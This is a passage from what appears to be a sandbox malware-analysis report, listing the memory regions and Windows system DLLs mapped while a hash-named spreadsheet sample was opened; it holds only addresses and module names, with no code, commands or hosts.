(normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 670 start_va = 0x73f90000 end_va = 0x74107fff monitored = 0 entry_point = 0x73fe8a90 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 671 start_va = 0x69e80000 end_va = 0x69ebffff monitored = 0 entry_point = 0x69ea1e50 region_type = mapped_file name = "audiodev.dll" filename = "\\Windows\\SysWOW64\\audiodev.dll" (normalized: "c:\\windows\\syswow64\\audiodev.dll") Region: id = 672 start_va = 0x69c40000 end_va = 0x69e7afff monitored = 0 entry_point = 0x69c9b370 region_type = mapped_file name = "wmvcore.dll" filename = "\\Windows\\SysWOW64\\WMVCORE.DLL" (normalized: "c:\\windows\\syswow64\\wmvcore.dll") Region: id = 673 start_va = 0x69c00000 end_va = 0x69c3dfff monitored = 0 entry_point = 0x69c04c30 region_type = mapped_file name = "wmasf.dll" filename = "\\Windows\\SysWOW64\\WMASF.DLL" (normalized: "c:\\windows\\syswow64\\wmasf.dll") Region: id = 674 start_va = 0x69af0000 end_va = 0x69bf7fff monitored = 0 entry_point = 0x69bde0a0 region_type = mapped_file name = "mfperfhelper.dll" filename = "\\Windows\\SysWOW64\\mfperfhelper.dll" (normalized: "c:\\windows\\syswow64\\mfperfhelper.dll") Region: id = 675 start_va = 0xb190000 end_va = 0xb19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b190000" filename = "" Region: id = 676 start_va = 0xb1a0000 end_va = 0xb1affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b1a0000" filename = "" Region: id = 677 start_va = 0x69a60000 end_va = 0x69ae0fff monitored = 0 entry_point = 0x69a7b260 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\SysWOW64\\sxs.dll" (normalized: "c:\\windows\\syswow64\\sxs.dll") Region: id = 678 start_va = 0xb1a0000 end_va = 0xb1a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1a0000" filename = "" Region: id = 679 start_va = 0xb1b0000 end_va = 0xb1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1b0000" filename = "" Region: id = 680 start_va = 0xb1c0000 end_va = 0xb1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1c0000" filename = "" Region: id = 681 start_va = 0xb1d0000 end_va = 0xb1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1d0000" filename = "" Region: id = 682 start_va = 0xb1e0000 end_va = 0xb1e1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1e0000" filename = "" Region: id = 683 start_va = 0xb1f0000 end_va = 0xb1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1f0000" filename = "" Region: id = 684 start_va = 0x16030000 end_va = 0x16521fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000016030000" filename = "" Region: id = 685 start_va = 0xb1c0000 end_va = 0xb1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1c0000" filename = "" Region: id = 686 start_va = 0xb200000 end_va = 0xb2fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b200000" filename = "" Region: id = 687 start_va = 0x71780000 end_va = 0x718fdfff monitored = 0 entry_point = 0x717fc630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 688 start_va = 0x73ae0000 end_va = 0x73daafff monitored = 0 entry_point = 0x73d1c4c0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 689 start_va = 0xb300000 end_va = 0xb33ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b300000" filename = "" Region: id = 690 start_va = 0xb340000 end_va = 0xb43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b340000" filename = "" Region: id = 691 start_va = 0xb1a0000 end_va = 0xb1a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b1a0000" filename = "" Region: id = 692 start_va = 0xb1a0000 end_va = 0xb1affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b1a0000" filename = "" Region: id = 693 start_va = 0xb1c0000 end_va = 0xb1c8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1c0000" filename = "" Region: id = 694 start_va = 0xb1d0000 end_va = 0xb1e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1d0000" filename = "" Region: id = 695 start_va = 0xb1f0000 end_va = 0xb205fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1f0000" filename = "" Region: id = 696 start_va = 0xb1a0000 end_va = 0xb1affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b1a0000" filename = "" Region: id = 697 start_va = 0x6aad0000 end_va = 0x6aadcfff monitored = 0 entry_point = 0x6aad3520 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 698 start_va = 0x6aa60000 end_va = 0x6aac6fff monitored = 0 entry_point = 0x6aa7b610 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 699 start_va = 0x6aa40000 end_va = 0x6aa50fff monitored = 0 entry_point = 0x6aa48fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 700 start_va = 0x6a980000 end_va = 0x6aa3efff monitored = 0 entry_point = 0x6a9b1e80 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 701 start_va = 0xb1a0000 end_va = 0xb1affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b1a0000" filename = "" Region: id = 702 start_va = 0xb160000 end_va = 0xb16afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b160000" filename = "" Region: id = 703 start_va = 0xb170000 end_va = 0xb17afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b170000" filename = "" Region: id = 704 start_va = 0xb180000 end_va = 0xb188fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b180000" filename = "" Region: id = 705 start_va = 0xb190000 end_va = 0xb198fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b190000" filename = "" Region: id = 706 start_va = 0xb1a0000 end_va = 0xb1a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b1a0000" filename = "" Region: id = 707 start_va = 0xb1c0000 end_va = 0xb1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b1c0000" filename = "" Region: id = 708 start_va = 0xb1d0000 end_va = 0xb5cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b1d0000" filename = "" Region: id = 709 start_va = 0x16530000 end_va = 0x167e0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "831518fee7137eb607ad0fd8b629784dd692f981f6060465079945a13dba6c4c.xlsxf981f6060465079945a13dba6c4cxlsx" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\831518fee7137eb607ad0fd8b629784dd692f981f6060465079945a13dba6c4c.xlsxf981f6060465079945a13dba6c4cxlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\831518fee7137eb607ad0fd8b629784dd692f981f6060465079945a13dba6c4c.xlsxf981f6060465079945a13dba6c4cxlsx") Region: id = 710 start_va = 0xb1d0000 end_va = 0xb1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b1d0000" filename = "" Region: id = 711 start_va = 0xb1e0000 end_va = 0xb5dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b1e0000" filename = "" Region: id = 712 start_va = 0x16530000 end_va = 0x167e0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "831518fee7137eb607ad0fd8b629784dd692f981f6060465079945a13dba6c4c.xlsxf981f6060465079945a13dba6c4cxlsx" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\831518fee7137eb607ad0fd8b629784dd692f981f6060465079945a13dba6c4c.xlsxf981f6060465079945a13dba6c4cxlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\831518fee7137eb607ad0fd8b629784dd692f981f6060465079945a13dba6c4c.xlsxf981f6060465079945a13dba6c4cxlsx") Region: id = 713 start_va = 0xb1e0000 end_va = 0xb2fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1e0000" filename = "" Region: id = 714 start_va = 0xb300000 end_va = 0xb4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b300000" filename = "" Region: id = 715 start_va = 0xb1e0000 end_va = 0xb1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1e0000" filename = "" Region: id = 716 start_va = 0xb2f0000 end_va = 0xb2fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b2f0000" filename = "" Region: id = 717 start_va = 0x69f50000 end_va = 0x6a13efff monitored = 0 entry_point = 0x69f95e20 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\SysWOW64\\msxml6.dll" (normalized: "c:\\windows\\syswow64\\msxml6.dll") Region: id = 718 start_va = 0xb1e0000 end_va = 0xb2cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1e0000" filename = "" Region: id = 719 start_va = 0xb1e0000 end_va = 0xb1e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\SysWOW64\\msxml6r.dll" (normalized: "c:\\windows\\syswow64\\msxml6r.dll") Region: id = 720 start_va = 0xb2c0000 end_va = 0xb2cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b2c0000" filename = "" Region: id = 721 start_va = 0xb1f0000 end_va = 0xb1f3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1f0000" filename = "" Region: id = 722 start_va = 0xb300000 end_va = 0xb3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b300000" filename = "" Region: id = 723 start_va = 0xb4e0000 end_va = 0xb4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b4e0000" filename = "" Region: id = 724 start_va = 0xb200000 end_va = 0xb20ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b200000" filename = "" Region: id = 725 start_va = 0xb200000 end_va = 0xb200fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b200000" filename = "" Region: id = 726 start_va = 0xb210000 end_va = 0xb213fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b210000" filename = "" Region: id = 727 start_va = 0xb220000 end_va = 0xb221fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b220000" filename = "" Region: id = 728 start_va = 0xb230000 end_va = 0xb230fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b230000" filename = "" Region: id = 729 start_va = 0xb240000 end_va = 0xb241fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b240000" filename = "" Region: id = 730 start_va = 0x16530000 end_va = 0x16a0dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000016530000" filename = "" Region: id = 731 start_va = 0xb210000 end_va = 0xb21ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b210000" filename = "" Region: id = 732 start_va = 0xb210000 end_va = 0xb21dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b210000" filename = "" Region: id = 733 start_va = 0xb220000 end_va = 0xb22dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b220000" filename = "" Region: id = 734 start_va = 0x16a10000 end_va = 0x16e8bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000016a10000" filename = "" Region: id = 735 start_va = 0x16e90000 end_va = 0x1730bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000016e90000" filename = "" Region: id = 736 start_va = 0xb160000 end_va = 0xb16dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b160000" filename = "" Region: id = 737 start_va = 0xb170000 end_va = 0xb17dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b170000" filename = "" Region: id = 738 start_va = 0x13f90000 end_va = 0x143e9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013f90000" filename = "" Region: id = 739 start_va = 0x16a10000 end_va = 0x16e69fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000016a10000" filename = "" Region: id = 740 start_va = 0x16e70000 end_va = 0x17e3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000016e70000" filename = "" Region: id = 741 start_va = 0xb210000 end_va = 0xb214fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\SysWOW64\\winnlsres.dll" (normalized: "c:\\windows\\syswow64\\winnlsres.dll") Region: id = 742 start_va = 0xb220000 end_va = 0xb22ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\winnlsres.dll.mui") Region: id = 743 start_va = 0xb230000 end_va = 0xb231fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b230000" filename = "" Region: id = 744 start_va = 0xb240000 end_va = 0xb241fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b240000" filename = "" Region: id = 745 start_va = 0xb250000 end_va = 0xb26efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b250000" filename = "" Region: id = 746 start_va = 0xb270000 end_va = 0xb28efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b270000" filename = "" Region: id = 747 start_va = 0xb470000 end_va = 0xb470fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b470000" filename = "" Region: id = 748 start_va = 0xb290000 end_va = 0xb29bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b290000" filename = "" Region: id = 749 start_va = 0xb2a0000 end_va = 0xb2abfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b2a0000" filename = "" Region: id = 750 start_va = 0xb400000 end_va = 0xb435fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b400000" filename = "" Region: id = 751 start_va = 0xb480000 end_va = 0xb4b5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b480000" filename = "" Region: id = 798 start_va = 0xb4f0000 end_va = 0xb5c5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b4f0000" filename = "" Region: id = 799 start_va = 0x13910000 end_va = 0x139e5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013910000" filename = "" Region: id = 833 start_va = 0xb2b0000 end_va = 0xb2bafff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b2b0000" filename = "" Region: id = 834 start_va = 0xb2d0000 end_va = 0xb2dafff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b2d0000" filename = "" Region: id = 835 start_va = 0xb2e0000 end_va = 0xb2e8fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b2e0000" filename = "" Region: id = 836 start_va = 0xb440000 end_va = 0xb448fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b440000" filename = "" Region: id = 837 start_va = 0xb450000 end_va = 0xb450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b450000" filename = "" Region: id = 838 start_va = 0xb460000 end_va = 0xb460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b460000" filename = "" Region: id = 839 start_va = 0x139f0000 end_va = 0x13d76fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000139f0000" filename = "" Region: id = 840 start_va = 0x17e40000 end_va = 0x181c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000017e40000" filename = "" Region: id = 841 start_va = 0x71200000 end_va = 0x71212fff monitored = 0 entry_point = 0x71209950 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 842 start_va = 0x70230000 end_va = 0x7025efff monitored = 0 entry_point = 0x702495e0 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 870 start_va = 0x181d0000 end_va = 0x1df66fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000181d0000" filename = "" Region: id = 871 start_va = 0x16030000 end_va = 0x1630efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000016030000" filename = "" Region: id = 1018 start_va = 0x71450000 end_va = 0x714eafff monitored = 0 entry_point = 0x7148f7e0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 1019 start_va = 0x714f0000 end_va = 0x7151efff monitored = 0 entry_point = 0x714fbb70 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 1020 start_va = 0x76900000 end_va = 0x76906fff monitored = 0 entry_point = 0x76901e10 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 1021 start_va = 0x6a860000 end_va = 0x6a872fff monitored = 0 entry_point = 0x6a8625d0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc6.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc6.dll") Region: id = 1022 start_va = 0x6a840000 end_va = 0x6a853fff monitored = 0 entry_point = 0x6a843c10 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll") Region: id = 1023 start_va = 0x71520000 end_va = 0x71531fff monitored = 0 entry_point = 0x71524510 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\SysWOW64\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll") Region: id = 1024 start_va = 0x71570000 end_va = 0x7177cfff monitored = 0 entry_point = 0x7165acb0 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 1025 start_va = 0xb4c0000 end_va = 0xb4c0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "counters.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 1026 start_va = 0x71400000 end_va = 0x7144efff monitored = 0 entry_point = 0x7140d850 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 1027 start_va = 0x713f0000 end_va = 0x713f7fff monitored = 0 entry_point = 0x713f1fc0 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 1028 start_va = 0x70a50000 end_va = 0x70ad3fff monitored = 0 entry_point = 0x70a76530 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 1029 start_va = 0x69dd0000 end_va = 0x69e37fff monitored = 0 entry_point = 0x69df70a0 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\SysWOW64\\webio.dll" (normalized: "c:\\windows\\syswow64\\webio.dll") Region: id = 1030 start_va = 0x6f9e0000 end_va = 0x6fa26fff monitored = 0 entry_point = 0x6f9f58d0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 1031 start_va = 0x6fa30000 end_va = 0x6fa37fff monitored = 0 entry_point = 0x6fa31920 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 1033 start_va = 0xb4d0000 end_va = 0xb4d2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\mswsock.dll.mui") Region: id = 1034 start_va = 0xb5d0000 end_va = 0xb5d7fff monitored = 0 entry_point = 0xb5d19c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 1035 start_va = 0xb5e0000 end_va = 0xb5e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wshqos.dll.mui") Region: id = 1036 start_va = 0xb5d0000 end_va = 0xb5d7fff monitored = 0 entry_point = 0xb5d19c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 1037 start_va = 0xb5e0000 end_va = 0xb5e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wshqos.dll.mui") Region: id = 1038 start_va = 0xb5d0000 end_va = 0xb5d7fff monitored = 0 entry_point = 0xb5d19c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 1039 start_va = 0xb5e0000 end_va = 0xb5e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wshqos.dll.mui") Region: id = 1040 start_va = 0xb5d0000 end_va = 0xb5d7fff monitored = 0 entry_point = 0xb5d19c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 1041 start_va = 0xb5e0000 end_va = 0xb5e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wshqos.dll.mui") Region: id = 1046 start_va = 0x69c10000 end_va = 0x69c3efff monitored = 0 entry_point = 0x69c25140 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\SysWOW64\\logoncli.dll" (normalized: "c:\\windows\\syswow64\\logoncli.dll") Region: id = 1047 start_va = 0xb5d0000 end_va = 0xb5d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b5d0000" filename = "" Region: id = 1048 start_va = 0xb5e0000 end_va = 0xb5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b5e0000" filename = "" Region: id = 1049 start_va = 0xb5f0000 end_va = 0xb5f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b5f0000" filename = "" Region: id = 1050 start_va = 0xb600000 end_va = 0xb61bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b600000" filename = "" Region: id = 1051 start_va = 0xb620000 end_va = 0xb621fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b620000" filename = "" Region: id = 1052 start_va = 0xb630000 end_va = 0xb646fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b630000" filename = "" Region: id = 1053 start_va = 0x16030000 end_va = 0x16521fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000016030000" filename = "" Region: id = 1054 start_va = 0x181d0000 end_va = 0x184f7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000181d0000" filename = "" Region: id = 1055 start_va = 0xb650000 end_va = 0xb650fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b650000" filename = "" Region: id = 1056 start_va = 0x143f0000 end_va = 0x144f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000143f0000" filename = "" Region: id = 1057 start_va = 0x143f0000 end_va = 0x144f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000143f0000" filename = "" Region: id = 1058 start_va = 0x143f0000 end_va = 0x144f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000143f0000" filename = "" Region: id = 1059 start_va = 0xb5d0000 end_va = 0xb5d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b5d0000" filename = "" Region: id = 1060 start_va = 0x143f0000 end_va = 0x144f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000143f0000" filename = "" Region: id = 1061 start_va = 0x143f0000 end_va = 0x144f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000143f0000" filename = "" Region: id = 1062 start_va = 0xb5d0000 end_va = 0xb5d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b5d0000" filename = "" Region: id = 1071 start_va = 0xb5d0000 end_va = 0xb5dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b5d0000" filename = "" Region: id = 1073 start_va = 0xb160000 end_va = 0xb16ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b160000" filename = "" Region: id = 1074 start_va = 0x69af0000 end_va = 0x69c0bfff monitored = 0 entry_point = 0x69b574f0 region_type = mapped_file name = "uiautomationcore.dll" filename = "\\Windows\\SysWOW64\\UIAutomationCore.dll" (normalized: "c:\\windows\\syswow64\\uiautomationcore.dll") Region: id = 1075 start_va = 0x66a50000 end_va = 0x66a68fff monitored = 0 entry_point = 0x66a547e0 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 1076 start_va = 0xb160000 end_va = 0xb160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b160000" filename = "" Region: id = 1083 start_va = 0xb170000 end_va = 0xb175fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b170000" filename = "" Region: id = 1084 start_va = 0xb180000 end_va = 0xb183fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b180000" filename = "" Region: id = 1085 start_va = 0xb190000 end_va = 0xb195fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b190000" filename = "" Region: id = 1086 start_va = 0xb1a0000 end_va = 0xb1a1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1a0000" filename = "" Region: id = 1087 start_va = 0xb1c0000 end_va = 0xb1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1c0000" filename = "" Region: id = 1088 start_va = 0xb5d0000 end_va = 0xb644fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b5d0000" filename = "" Region: id = 1089 start_va = 0xb650000 end_va = 0xb651fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b650000" filename = "" Region: id = 1090 start_va = 0xee20000 end_va = 0xee22fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ee20000" filename = "" Region: id = 1091 start_va = 0xee30000 end_va = 0xee31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ee30000" filename = "" Region: id = 1092 start_va = 0xee40000 end_va = 0xee41fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ee40000" filename = "" Region: id = 1093 start_va = 0xee50000 end_va = 0xee50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ee50000" filename = "" Region: id = 1094 start_va = 0xee70000 end_va = 0xee71fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ee70000" filename = "" 